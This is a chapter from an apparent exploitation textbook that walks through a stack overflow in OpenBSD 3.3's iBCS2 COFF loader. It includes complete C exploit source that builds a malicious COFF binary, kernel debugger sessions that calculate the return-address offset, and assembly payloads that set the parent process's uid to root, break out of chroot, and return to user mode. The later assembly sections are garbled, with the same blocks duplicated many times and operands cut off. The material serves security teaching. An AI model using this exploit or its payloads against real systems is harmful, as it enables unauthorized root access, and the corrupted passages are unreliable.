Chapter 24: Exploiting Kernel Vulnerabilities

The exec_ibcs2_coff_prep_zmagic() Vulnerability

In order to reach the vulnerability in exec_ibcs2_coff_prep_zmagic() , we need to construct the smallest possible fake COFF binary. This section will discuss how to create this fake executable.

Several COFF - related structures will be introduced, filled in with appropriate values, and saved into the fake COFF file. In order to reach the vulnerable code, we must have certain headers, such as the file header, aout header, and the section headers appended from the beginning of the executable. If we do not have any of these sections, the prior COFF executable handler functions will return an error and we will never reach the vulnerable function, vn_rdwr() .

Pseudo code for the minimal layout for the fake COFF executable is as follows .

 --------------- File Header --------------- Aout Header --------------- Section Header (.text) --------------- Section Header (.data) --------------- Section Header (.shlib) --------------- 

The following exploit code will create the fake COFF executable that will be sufficient enough to change the execution of code by overwriting the saved return address. Various details about the exploit will be introduced later in this chapter; for now, we should concentrate only on the COFF executable creation.

 ------------------------------ obsd_ex1.c ---------------------------------     /** creates a fake COFF executable with large .shlib section size **/   #include <stdio.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h> #include <sys/param.h> #include <sys/sysctl.h> #include <sys/signal.h>     unsigned char shellcode[] = "\xcc\xcc"; /* only int3 (debug interrupt) at the moment */     #define ZERO(p) memset(&p, 0x00, sizeof(p))     /*  * COFF file header  */     struct coff_filehdr {     u_short     f_magic;        /* magic number */     u_short     f_nscns;        /* # of sections */     long        f_timdat;       /* timestamp */     long        f_symptr;       /* file offset of symbol table */     long        f_nsyms;        /* # of symbol table entries */     u_short     f_opthdr;       /* size of optional header */     u_short     f_flags;        /* flags */ };     /* f_magic flags */ #define COFF_MAGIC_I386 0x14c     /* f_flags */ #define COFF_F_RELFLG   0x1 #define COFF_F_EXEC     0x2 #define COFF_F_LNNO     0x4 #define COFF_F_LSYMS    0x8 #define COFF_F_SWABD    0x40 #define COFF_F_AR16WR   0x80 #define COFF_F_AR32WR   0x100     /*  * COFF system header  */     struct coff_aouthdr {     short       a_magic;     short       a_vstamp;     long        a_tsize;     long        a_dsize;     long        a_bsize;     long        a_entry;     long        a_tstart;     long        a_dstart; };     /* magic */ #define COFF_ZMAGIC     0413     /*  * COFF section header  */     struct coff_scnhdr {     char        s_name[8];     long        s_paddr;     long        s_vaddr;     long        s_size;     long        s_scnptr;     long        s_relptr;     long        s_lnnoptr;     u_short     s_nreloc;     u_short     s_nlnno;     long        s_flags; };     /* s_flags */ #define COFF_STYP_TEXT          0x20 #define COFF_STYP_DATA          0x40 #define COFF_STYP_SHLIB         0x800     int main(int argc, char **argv) {   u_int i, fd, debug = 0;   u_char *ptr, *shptr;   u_long *lptr, offset;   char *args[] = { "./ibcs2own", NULL};   char *envs[] = { "RIP=theo", NULL};   //COFF structures   struct coff_filehdr fhdr;   struct coff_aouthdr ahdr;   struct coff_scnhdr  scn0, scn1, scn2;        if(argv[1]) {       if(!strncmp(argv[1], "-v", 2))               debug = 1;       else {               printf("-v: verbose flag only\n");               exit(0);             }     }         ZERO(fhdr);     fhdr.f_magic = COFF_MAGIC_I386;     fhdr.f_nscns = 3; //TEXT, DATA, SHLIB     fhdr.f_timdat = 0xdeadbeef;     fhdr.f_symptr = 0x4000;     fhdr.f_nsyms = 1;     fhdr.f_opthdr = sizeof(ahdr); //AOUT header size     fhdr.f_flags = COFF_F_EXEC;         ZERO(ahdr);     ahdr.a_magic = COFF_ZMAGIC;     ahdr.a_tsize = 0;     ahdr.a_dsize = 0;     ahdr.a_bsize = 0;     ahdr.a_entry = 0x10000;     ahdr.a_tstart = 0;     ahdr.a_dstart = 0;         ZERO(scn0);     memcpy(&scn0.s_name, ".text", 5);     scn0.s_paddr = 0x10000;     scn0.s_vaddr = 0x10000;     scn0.s_size = 4096;     //file offset of .text segment     scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3);     scn0.s_relptr = 0;     scn0.s_lnnoptr = 0;     scn0.s_nreloc = 0;     scn0.s_nlnno = 0;     scn0.s_flags = COFF_STYP_TEXT;         ZERO(scn1);     memcpy(&scn1.s_name, ".data", 5);     scn1.s_paddr = 0x10000 - 4096;     scn1.s_vaddr = 0x10000 - 4096;     scn1.s_size = 4096;     //file offset of .data segment     scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096;     scn1.s_relptr = 0;     scn1.s_lnnoptr = 0;     scn1.s_nreloc = 0;     scn1.s_nlnno = 0;     scn1.s_flags = COFF_STYP_DATA;         ZERO(scn2);     memcpy(&scn2.s_name, ".shlib", 6);     scn2.s_paddr = 0;     scn2.s_vaddr = 0;         //overflow vector!!!     scn2.s_size = 0xb0; /* offset from start of buffer to saved eip */         //file offset of .shlib segment     scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + (2*4096);     scn2.s_relptr = 0;     scn2.s_lnnoptr = 0;     scn2.s_nreloc = 0;     scn2.s_nlnno = 0;     scn2.s_flags = COFF_STYP_SHLIB;         ptr = (char *) malloc(sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + \                  3*4096);     memset(ptr, 0xcc, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096);         memcpy(ptr, (char *) &fhdr, sizeof(fhdr));     offset = sizeof(fhdr);           memcpy((char *) (ptr+offset), (char *) &ahdr, sizeof(ahdr));     offset += sizeof(ahdr);         memcpy((char *) (ptr+offset), (char *) &scn0, sizeof(scn0));     offset += sizeof(scn0);         memcpy((char *) (ptr+offset), (char *) &scn1, sizeof(scn1));     offset += sizeof(scn1);         memcpy((char *) (ptr+offset), (char *) &scn2, sizeof(scn2));         lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \            (sizeof(scn0)*3) + (2*4096) + 0xb0 - 8);         shptr = (char *) malloc(4096);     if(debug)       printf("payload adr: 0x%.8x\n", shptr);     memset(shptr, 0xcc, 4096);         *lptr++ = 0xdeadbeef;     *lptr = (u_long) shptr;         memcpy(shptr, shellcode, sizeof(shellcode)-1);         unlink("./ibcs2own"); /* remove the leftovers from prior executions */         if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {                 perror("open");                 exit(-1);         }         write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + (4096*3));     close(fd);     free(ptr);         execve(args[0], args, envs);     perror("execve");     } 

Let's compile this code.

 bash-2.05b# uname -a OpenBSD 3.3 GENERIC#44 i386 bash-2.05b# gcc -o obsd_ex1 obsd_ex1.c 

Calculating Offsets and Breakpoints

Before running any kernel exploit, you should always set up the kernel debugger. In this way, you will be able to perform various calculations in order to gain execution control. We will use ddb, the kernel debugger, in this exploit. Type the following commands to make sure ddb is set up properly. Keep in mind that you should have some sort of console access in order to debug the OpenBSD kernel.

 bash-2.05b# sysctl -w ddb.panic=1 ddb.panic: 1 -> 1 bash-2.05b# sysctl -w ddb.console=1 ddb.console: 1 -> 1 

The first sysctl command configures ddb to start up when it detects a kernel panic, and the second will make ddb accessible from the console at any time with the ESC-CTRL-ALT key combination.

 bash-2.05b# objdump -d --start-address=0xd048ac78 --stop-address=0xd048c000\ > /bsd  more     /bsd:     file format a.out-i386-netbsd     Disassembly of section .text:     d048ac78 <_exec_ibcs2_coff_prep_zmagic>: d048ac78:       55                      push   %ebp d048ac79:       89 e5                   mov    %esp,%ebp d048ac7b:       81 ec bc 00 00 00       sub 
 bash-2.05b# objdump -d --start-address=0xd048ac78 --stop-address=0xd048c000\ > /bsd  more /bsd: file format a.out-i386-netbsd Disassembly of section .text: d048ac78 <_exec_ibcs2_coff_prep_zmagic>: d048ac78: 55 push %ebp d048ac79: 89 e5 mov %esp,%ebp d048ac7b: 81 ec bc 00 00 00 sub $0xbc,%esp d048ac81: 57 push %edi [deleted] d048af5d: c9 leave d048af5e: c3 ret ^C bash-2.05b# objdump -d --start-address=0xd048ac78 --stop-address=0xd048af5e\ > /bsd  grep vn_rdwr d048aef3: e8 70 1b d7 ff call d01fca68 <_vn_rdwr> 
xbc,%esp d048ac81: 57 push %edi [deleted] d048af5d: c9 leave d048af5e: c3 ret ^C bash-2.05b# objdump -d --start-address=0xd048ac78 --stop-address=0xd048af5e\ > /bsd grep vn_rdwr d048aef3: e8 70 1b d7 ff call d01fca68 <_vn_rdwr>

In this example, 0xd048aef3 is the address of the offending vn_rdwr function. In order to calculate the distance between the saved return address and the stack buffer, we will need to set a breakpoint on the entry point (the prolog) of the exec_ibcs2_coff_prep_zmagic() function and another one at the offending vn_rdwr() function. This will calculate the proper distance between the base argument and the saved return address (also the saved base pointer).

 CTRL+ALT+ESC bash-2.05b# Stopped at          _Debugger+0x4: leave ddb> x/i 0xd048ac78 _exec_ibcs2_coff_prep_zmagic:     pushl     %ebp ddb> x/i 0xd048aef3 _exec_ibcs2_coff_prep_zmagic+0x27b:     call     _vn_rdwr ddb> break 0xd048ac78  ddb> break 0xd048aef3 ddb> cont ^M     bash-2.05b# ./obsd_ex1 Breakpoint at   _exec_ibcs2_coff_prep_zmagic:   pushl   %ebp ddb> x/x $esp,1 0xd4739c5c:     d048a6c9     !!saved return address at: 0xd4739c5c ddb> x/i 0xd048a6c9 _exec_ibcs2_coff_makecmds+0x61:     movl     %eax,%ebx ddb> x/i 0xd048a6c9 - 5 _exec_ibcs2_coff_makecmds+0x5c: call                                  _exec_ibcs2_coff_prep_zmagic ddb> cont Breakpoint at   _exec_ibcs2_coff_prep_zmagic+0x27b:     call      _vn_rdwr ddb> x/x $esp,3 0xd4739b60:     0     d46c266c     d4739bb0                          (base argument to vn_rdwr) ddb> x/x $esp 0xd4739b60:     0 ddb> ^M 0xd4739b64:     d46c266c ddb> ^M 0xd4739b68:     d4739bb0              -->  addr of 'char buf[128]'  ddb> x/x $ebp 0xd4739c58:     d4739c88  --> saved %ebp ddb> ^M 0xd4739c5c:     d048a6c9  --> saved %eip  -> addr on stack where the saved instruction pointer is stored 

In the x86 calling convention ( assuming the frame pointer is not omitted, that is, -fomit-frame-pointer ), the base pointer always points to a stack location where the saved (caller's) frame pointer and instruction pointer is stored. In order to calculate the distance between the stack buffer and the saved %eip , the following operation is performed.

 ddb> print 0xd4739c5c - 0xd4739bb0       ac ddb> boot sync 

The boot sync command will reboot the system.

The distance between the address of saved return address and the stack buffer is 172 ( 0xac ) bytes. Setting the section data size to 176 ( 0xb0 ) in the .shlib section header will give us control over the saved return address.

Overwriting the Return Address and Redirecting Execution

After calculating the location of the return address relative to the overflowed buffer, the following lines of code in the obsd_ex1.c should now make better sense.

 [1] lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \            (sizeof(scn0)*3) + (2*4096) + 0xb0 - 8);     [2] shptr = (char *) malloc(4096);     if(debug)       printf("payload adr: 0x%.8x\t", shptr);     memset(shptr, 0xcc, 4096);         *lptr++ = 0xdeadbeef; [3] *lptr = (u_long) shptr; 

Basically, in [1] , we are advancing the lptr pointer to the location in the section data that will overwrite the saved base pointer as well as the saved return address. After this operation, a heap buffer will be allocated [2] , which will be used to store the kernel payload (this will be explained later). Now, the 4 bytes in the section data, which will be used to overwrite the return address, are updated with the address of this newly allocated user -land heap buffer [3] . Execution will be hooked and redirected to the user-land heap buffer, which is filled with only int3 debug interrupts. This will cause ddb to kick in.

 bash-2.05b# ./obsd_ex1 -v payload adr: 0x00005000 Stopped at     0x5001:     int      ddb> x/i $eip,3 0x5001:     int      0x5002:     int      0x5003:     int 

This lovely output from the kernel debugger shows that we have gained full execution control with kernel privileges ( SEL_KPL ).

 ddb> show registers es          0x10 ds          0x10 .. ebp          0xdeadbeef .. eip          0x5001 --> user-land address cs          0x8 

Locating the Process Descriptor (or the Proc Structure)

The following operations will enable us to gather process structure information that is needed for credential and chroot manipulation payloads. There are many ways to locate the process structure. The two we look at in this section are the stack lookup method, which is not recommended on OpenBSD, and the sysctl() system call.

Stack Lookup

In the OpenBSD kernel, depending on the vulnerable interface, the process structure pointer might be in a fixed address relative to the stack pointer. So, after we gain execution control, we can add the fixed offset (delta between stack pointer and the location of the proc structure pointer) to the stack pointer and retrieve the pointer to the proc structure. On the other hand, with Linux, the kernel always maps the process structure to the beginning of the per-process kernel stack. This feature of Linux makes locating the process structure trivial.

sysctl() Syscall

The sysctl is a system call to get and set kernel level information from user land. It has a simple interface to pass data from kernel to user land and back. The sysctl interface is structured into several sub- components including the kernel, hardware, virtual memory, net, file system, and architecture system control interfaces. We should concentrate on the kernel sysctls , which are handled by the kern_sysctl() function.


See sys/kern/kern_sysctl.c: line 234.

The kern_sysctl() function also assigns different handlers to certain queries, such as proc structure, clock rate, v-node, and file information. The process structure is handled by the sysctl_doproc() function; this is the interface to the kernel-land information that we are after.

 int sysctl_doproc(name, namelen, where, sizep)         int *name;         u_int namelen;         char *where;         size_t *sizep; {     ...     [1] for (; p != 0; p = LIST_NEXT(p, p_list)) {     ... [2]        switch (name[0]) {                     case KERN_PROC_PID:                         /* could do this with just a lookup */ [3]                     if (p->p_pid != (pid_t)name[1])                                 continue;                         break;                     ...               }                 ....                     if (buflen >= sizeof(struct kinfo_proc)) { [4]                     fill_eproc(p, &eproc); [5]                     error = copyout((caddr_t)p, &dp->kp_proc,                                         sizeof(struct proc)); ....     void fill_eproc(p, ep)         register struct proc *p;         register struct eproc *ep; {         register struct tty *tp;     [6]        ep->e_paddr = p; 

Also, for sysctl_doproc() , there can be different types of queries handled by the switch statement [2] . KERN_PROC_PID is sufficient enough to gather the needed address about any process's proc structure. For the select() overflow, it was sufficient enough to gather the parent process' proc address. The setitimer() vulnerability makes use of the sysctl() interface in many different ways (which will be discussed later).

The sysctl_doproc() code iterates through the linked list of proc structures [1] in order to find the queried pid [3] . If found, certain structures ( eproc and kp_proc ) get filled in [4] and [5] and subsequently copyout to user land. The fill_eproc() (called from [4] ) does the trick and copies the proc address of the queried pid into the e_paddr member of the eproc structure [6] . In turn , the proc address is eventually copied out to user land in the kinfo_proc structure (which is the main data structure for the sysctl_doproc() function). For further information on members of these structures see sys/sys/sysctl.h .

The following is the function we'll use to retrieve the kinfo_proc structure.

 void get_proc(pid_t pid, struct kinfo_proc *kp) {    u_int arr[4], len;             arr[0] = CTL_KERN;         arr[1] = KERN_PROC;         arr[2] = KERN_PROC_PID;         arr[3] = pid;         len = sizeof(struct kinfo_proc);         if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {                 perror("sysctl");                 exit(-1);         }     } 

CTL_KERN will be dispatched to kern_sysctl() by sys_sysctl() . KERN_PROC will be dispatched to sysctl_doproc() by kern_sysctl() . The aforementioned switch statement will handle KERN_PROC_PID , eventually returning the kinfo_proc structure.

Kernel Mode Payload Creation

In this section, we will go into the development of various tiny payloads that will eventually modify certain fields of its parent process's proc structure, in order to achieve elevated privileges and break out of chrooted jail environments. Then, we'll chain the developed assembly code with the code that will work our way back to user land, thus giving us new privileges with no restrictions.

p_cred and u_cred

We'll start with the privilege elevation section of the payload. What follows is the assembly code that alters ucred (credentials of the user) and pcred (credentials of the process) of any given proc structure. The exploit code fills in the proc structure address of its parent process by using the sysctl() system call (discussed in the previous section), replacing .long 0x12345678 . The initial call and pop instructions will load the address of the given proc structure address into %edi . You can use a well-known address-gathering technique used in almost every shellcode, as described in Phrack ( ).

 call moo .long 0x12345678   <-- pproc addr .long 0xdeadcafe .long 0xbeefdead nop nop nop moo: pop  %edi mov  (%edi),%ecx      # parent's proc addr in ecx                           # update p_ruid mov  0x10(%ecx),%ebx  # ebx = p->p_cred xor  %eax,%eax        # eax = 0 mov  %eax,0x4(%ebx)   # p->p_cred->p_ruid = 0                           # update cr_uid mov  (%ebx),%edx      # edx = p->p_cred->pc_ucred mov  %eax,0x4(%edx)   # p->p_cred->pc_ucred->cr_uid = 0 

Breaking chroot

Next , a tiny assembly code fragment will be used as the chroot breaker for our ring payload. Without going into complex details, let's briefly look at how chroot is checked on a per-process basis. chroot jails are implemented by filling in the fd_rdir member of the filedesc (open files structure) with the desired jail directories' vnode pointer. When the kernel serves any given process for certain requests , it checks whether this pointer is filled in with a specific v-node.

If the v-node is found, the specific process is handled differently. The kernel creates the notion of a new root directory for this process, thus jailing it into a predefined directory. For a non-chrooted process, this pointer is zero/unset. Without going into further details about implementation, setting this pointer to NULL breaks chroot. fd_rdir is referenced through the proc structure as follows.


As with the credentials structure, filedesc is also trivial to access and alter with only two instruction additions to our payload.

 # update p->p_fd->fd_rdir to break chroot() mov  0x14(%ecx),%edx    # edx = p->p_fd mov  %eax,0xc(%edx)     # p->p_fd->fd_rdir = 0 

Returning Back from Kernel Payload

After we alter certain fields of the proc structure, achieve elevated privileges, and escape from the chroot jail, we need to resume the normal operation of the system. Basically, we must return to user mode, which means the process that issued the system call, or return back to kernel code. Returning to user mode via the iret instruction is simple and straightforward; unfortunately , it is sometimes not possible, because the kernel might have certain synchronization objects locked, such as with mutex locks and rdwr locks. In these cases, you will need to return to the address in kernel code that will unlock these synchronization objects, thereby saving you from crashing the kernel. Certain people in the hacking community have misjudged return to kernel code; we urge them to use this method to look into more vulnerable kernel code and try to develop exploits for it. In practice, it becomes clear that returning back to kernel mode where synchronization objects are being unlocked is the best solution for resuming the system flow. If we do not have any such condition, we simply use the iret technique.

Return to User Mode: iret Technique

The code that follows is the system call handler that is called from the Interrupt Service Routine (ISR). This function calls the high-level (written in C) system call handler [1] and, after the actual system call returns, sets up the registers and returns to user mode [2].

 IDTVEC(syscall)         pushl                 # size of instruction for restart syscall1:         pushl   $T_ASTFLT       # trap # for doing ASTs         INTRENTRY         movl    _C_LABEL(cpl),%ebx         movl    TF_EAX(%esp),%esi       # syscall no [1]     call    _C_LABEL(syscall) 2:      /* Check for ASTs on exit to user mode. */         cli         cmpb 
 IDTVEC(syscall) pushl $2 # size of instruction for restart syscall1: pushl $T_ASTFLT # trap # for doing ASTs INTRENTRY movl _C_LABEL(cpl),%ebx movl TF_EAX(%esp),%esi # syscall no [1] call _C_LABEL(syscall) 2: /* Check for ASTs on exit to user mode. */ cli cmpb $0,_C_LABEL(astpending) je 1f /* Always returning to user mode here. */ movb $0,_C_LABEL(astpending) sti /* Pushed T_ASTFLT into tf_trapno on entry. */ call _C_LABEL(trap) jmp 2b 1: cmpl _C_LABEL(cpl),%ebx jne 3f [2] INTRFASTEXIT #define INTRFASTEXIT \ popl %es ; \ popl %ds ; \ popl %edi ; \ popl %esi ; \ popl %ebp ; \ popl %ebx ; \ popl %edx ; \ popl %ecx ; \ popl %eax ; \ addl $8,%esp ; \ iret 
,_C_LABEL(astpending) je 1f /* Always returning to user mode here. */ movb
 IDTVEC(syscall) pushl $2 # size of instruction for restart syscall1: pushl $T_ASTFLT # trap # for doing ASTs INTRENTRY movl _C_LABEL(cpl),%ebx movl TF_EAX(%esp),%esi # syscall no [1] call _C_LABEL(syscall) 2: /* Check for ASTs on exit to user mode. */ cli cmpb $0,_C_LABEL(astpending) je 1f /* Always returning to user mode here. */ movb $0,_C_LABEL(astpending) sti /* Pushed T_ASTFLT into tf_trapno on entry. */ call _C_LABEL(trap) jmp 2b 1: cmpl _C_LABEL(cpl),%ebx jne 3f [2] INTRFASTEXIT #define INTRFASTEXIT \ popl %es ; \ popl %ds ; \ popl %edi ; \ popl %esi ; \ popl %ebp ; \ popl %ebx ; \ popl %edx ; \ popl %ecx ; \ popl %eax ; \ addl $8,%esp ; \ iret 
,_C_LABEL(astpending) sti /* Pushed T_ASTFLT into tf_trapno on entry. */ call _C_LABEL(trap) jmp 2b 1: cmpl _C_LABEL(cpl),%ebx jne 3f [2] INTRFASTEXIT #define INTRFASTEXIT \ popl %es ; \ popl %ds ; \ popl %edi ; \ popl %esi ; \ popl %ebp ; \ popl %ebx ; \ popl %edx ; \ popl %ecx ; \ popl %eax ; \ addl ,%esp ; \ iret

We will implement the following routine based on the previous initial and post system call handler, emulating a return from interrupt operation.

 cli     # set up various selectors for user-land # es = ds = 0x1f pushl 
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x1f popl %es pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x1f popl %ds # esi = esi = 0x00 pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00 popl %edi pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00 popl %esi # ebp = 0xdfbfd000 pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00 popl %ebx pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00 popl %edx pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00 popl %ecx pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00 popl %eax pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x1f # ss = 0x1f pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
xdfbfd000 # esp = 0xdfbfd000 pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x287 # eflags pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl
 cli # set up various selectors for user-land # es = ds = 0x1f pushl $0x1f popl %es pushl $0x1f popl %ds # esi = esi = 0x00 pushl $0x00 popl %edi pushl $0x00 popl %esi # ebp = 0xdfbfd000 pushl $0xdfbfd000 popl %ebp # ebx = edx = ecx = eax = 0x00 pushl $0x00 popl %ebx pushl $0x00 popl %edx pushl $0x00 popl %ecx pushl $0x00 popl %eax pushl $0x1f # ss = 0x1f pushl $0xdfbfd000 # esp = 0xdfbfd000 pushl $0x287 # eflags pushl $0x17 # cs user-land code segment selector # set set user mode instruction pointer in exploit code pushl $0x00000000 # empty slot for ring3 %eip iret 
x00000000 # empty slot for ring3 %eip iret

Return to Kernel Code: sidt Technique and _kernel_text Search

This technique of returning to user mode depends on the interrupt descriptor table register (IDTR). It contains the starting address of the interrupt descriptor table (IDT).

Without going into unnecessary details, the IDT is the table that holds the interrupt handlers for various interrupt vectors. A number represents each interrupt in x86 from 0 to 255; these numbers are called the interrupt vectors. These vectors are used to locate the initial handler for any given interrupt inside the IDT. The IDT contains 256 entries of 8 bytes each. There can be three different types of IDT descriptor entries, but we will concentrate only on the system gate descriptor. The trap gate descriptor is used to set up the initial system call handler discussed in the previous section.


